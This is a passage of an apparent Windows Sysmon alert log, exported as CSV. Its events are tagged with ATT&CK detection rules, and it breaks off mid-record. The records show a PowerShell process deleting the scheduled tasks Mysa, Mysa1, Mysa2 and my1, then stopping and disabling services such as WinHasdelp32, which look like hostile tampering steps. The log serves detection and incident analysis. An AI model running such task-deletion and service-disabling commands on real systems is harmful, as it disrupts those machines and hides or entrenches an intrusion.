+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.605201700Z"",""eventRecordID"":""2473"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.580\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001054651e00}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.580"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001054651e00}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.795",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.548
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001016631e00}
+ProcessId: 7116
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.551228800Z"",""eventRecordID"":""2472"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.548\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001016631e00}\r\nProcessId: 7116\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.548"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001016631e00}"",""processId"":""7116"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.774",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.475
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ff601e00}
+ProcessId: 7660
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.513725700Z"",""eventRecordID"":""2471"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.475\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010ff601e00}\r\nProcessId: 7660\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: 
C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.475"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010ff601e00}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.761",14,"ATT&CK T1064: Windows 
Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.417 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b65e1e00} +ProcessId: 3880 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.426597600Z"",""eventRecordID"":""2470"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.417\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010b65e1e00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration 
Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.417"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010b65e1e00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.591",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.375 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fd5c1e00} +ProcessId: 6880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.379550200Z"",""eventRecordID"":""2468"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.375\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fd5c1e00}\r\nProcessId: 6880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.375"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010fd5c1e00}"",""processId"":""6880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.542",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.267 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010305a1e00} +ProcessId: 7636 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.276869200Z"",""eventRecordID"":""2465"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.267\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010305a1e00}\r\nProcessId: 7636\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:03.267"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010305a1e00}"",""processId"":""7636"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:31.526",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.209 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010fe581e00} +ProcessId: 2056 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHasdelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHasdelp32 Start= 